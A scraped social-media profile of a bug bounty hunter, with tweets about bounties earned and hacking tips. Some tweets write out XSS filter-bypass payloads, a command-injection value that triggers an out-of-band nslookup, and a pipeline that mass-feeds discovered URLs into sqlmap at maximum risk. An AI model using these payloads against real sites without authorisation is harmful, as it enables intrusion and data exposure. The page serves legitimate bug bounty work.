Zin Min Phyo
@zin_min_phyo
Followers
1,469
Following
1,439
Media
86
Statuses
702
I'm Independent Web Security Researcher From Myanmar H1: BC:
MM
Joined February 2019
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Adrián Marcelo
• 145575 Tweets
Arath
• 117692 Tweets
PROTECT BINI AT ALL COST
• 68328 Tweets
写真・動画
• 63435 Tweets
Demokratie
• 46779 Tweets
Ampel
• 45254 Tweets
PrabowoJKW RUKUNkompak
• 21785 Tweets
BekerjaBERSATU UntukNKRI
• 21110 Tweets
Ergebnis
• 19755 Tweets
食べ放題
• 18345 Tweets
Happy New Week
• 16901 Tweets
JKIA
• 16841 Tweets
MCM MEW IN SEOUL
• 16727 Tweets
DANGEROUS NEXT DOOR
• 11905 Tweets
#DANGEROUS_OUT_NOW
• 11601 Tweets
I earned a $750 bounty
Tips: I never miss dir fuzzing
ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml,.sql,.old,.at,.inc -w path -u -t 5000
#bugbounty
#bugbountytips
12
102
363
$2250 USD bounty for reporting a security issue
Bugs: Information Disclosure and Cloudflare Bypass Reflected XSS
Bypass payloads:
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
#BugBounty
#bugbountytips
12
103
313
I got €750, just 2 day hunting!!
Tips :
target use the pimcore cms? try this '/js/routing' , '/js/routing?callback=fos.Router.setData'
got admin informations and path,etc,, Bounty €300
#bugbountytips
#bugbounty
5
54
201
After long break, I quit my job and went back to bug hunting
It only took 1 hour to find the bug.
#bugbounty
15
6
198
I earn a €300 bounty on the Yogosha platform
AEM_Tips:
I analyzed the javascript code, I found this parameter, but I can't bypass of Content-Type
here is the template:
Ref:
Special thanks to
@AEMSecurity
#BugBountyTips
4
49
133
If you found aspx site?
find debug page like this
you will seen Directories,Memory usage,Server Environment,etc,,
Bounty €150
#bugbountytips
#bugbounty
1
34
75
I earned a 500 USD + 100 Euro Bounty
Tips: check the WordPress version from install.php
#Bugbountytip
#Bugbounty
3
13
56
Yayyyy, I receive 1500 Euro bounty from
@zerocopter
Platform
By the way, did you see my internet 🤣
#bugbounty
#Log4RCE
4
3
54
2
14
42
I got €300 bounty
Bug : Accounts Takeover
Tips : Alway check the source codes :)
#bugbountytips
#bugbounty
3
0
24
use the TYPO3? use dirsearch
got phpinfo file
.aa .html got typo3 debug page
Bounty €300
#bugbountytips
#bugbounty
1
6
16
I got Euro 600 + 100 USD Bounty
Thank you
@YogoshaOfficial
Thank you Zapier Security Team
Bug type:
403 Bypass
Rate Limint
Informations Disclosure,etc
#BugBounty
1
2
15
Target using s3,zendesk ?
Try file upload, poc.jpg, poc.htm.jpg bypass with burp
Got store XSS,xml DoS,SSRF
bounty $200
#bugbountytips
#bugbounty
0
3
10
Small awards
Bugs:
CVE-2021-38314
Apache 2.4.48 Mod_Proxy SSRF(CVE-2021-40438)
Information Disclosure
#BugBounty
0
3
12
@ynsmroztas
Detect the OOB first
test%0A%24%28nslookup%24IFS%249PoC.*******.oastify.com%29%0Atest
Some time firewall will block /etc/passwd
0
1
10
Hey! I am looking for a hunter for our team. Send me a collaboration request on 🤝
#BugBounty
#LetsHackTogether
0
1
7
In December, I submitted 6 vulnerabilities to 5 programs on
@Hacker0x01
.
#TogetherWeHitHarder
0
0
7
finally 💥🔥
🚨Nuxt.Js Vulnerabilities 🔥
@pdnuclei
1. Arbitrary File Read in Dev Mode - Nuxt.js [high]
2. Semi Arbitrary File Read in Dev Mode - Nuxt.js [medium]
3. Error Page XSS - Nuxt.js [medium]
Nuclei Template -
#bugbounty
#hackwithautomation
#pdteam
3
63
209
1
1
6
After i fuzzing, i found the database backup files, i got many sensitive information But they rate low risk. $500USD
0
0
5
@YogoshaOfficial
surprised me every time.
Tips: don't forget to check manually
Bug: web cache poisoning
#bugbounty
#bugbountytips
1
1
4
အိမ်မက်တွေ ရပ်တန့်ကုန်ပီ မအေလိုး မင်းအောင်လိူင်
Its monsoon in India, but it rained Account Takeovers for me.😀!
I Would be publishing a write up on this soon.
Thanks
@Bugcrowd
@codingo_
❤
#bugbounty
#TakeHacktion
67
60
905
0
0
4
I was awarded a €750 + 200 USD bounty
New year + good bounty
0
0
3
In August, I submitted 16 vulnerabilities to 11 programs on
@Hacker0x01
.
#TogetherWeHitHarder
0
0
4
In October, I submitted 15 vulnerabilities to 8 programs on
@Hacker0x01
.
#TogetherWeHitHarder
0
0
4
0
0
3
0
1
3
😂😂😂
When I was Hunting in private
#BugBounty
program
Fuc**** developer showed me that.
#bugbountytips
10
7
43
0
1
2
The
@YogoshaOfficial
team still ignores my email, I didn't receive my bounties, Is it enough for waiting?
Please give a specific answer.
I transfer my bounty to the bank account on
@YogoshaOfficial
, but I didn't receive money, I contact to support team, but they do not respond to me.
today I got a small reward from yogosha CVD, possible to I lost too this money?
@YogoshaOfficial
@YogoshaM
#bugbounty
#yogosha
1
0
2
2
0
3
0
0
2
@alicanact60
@PlayStation
@Hacker0x01
I reported a similar issue on H1, but h1_trigger didn't accept my report.
1
0
2
Total reports:13
now two report accept, duplicate:5 other are wating....
0
0
2
@_Bugbountytips_
subfindr -d -silent | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli -batch –random-agent --level=5 --risk=3 -threads 5
2
2
2
0
0
2
1
0
2
I transfer my bounty to the bank account on
@YogoshaOfficial
, but I didn't receive money, I contact to support team, but they do not respond to me.
today I got a small reward from yogosha CVD, possible to I lost too this money?
@YogoshaOfficial
@YogoshaM
#bugbounty
#yogosha
1
0
2
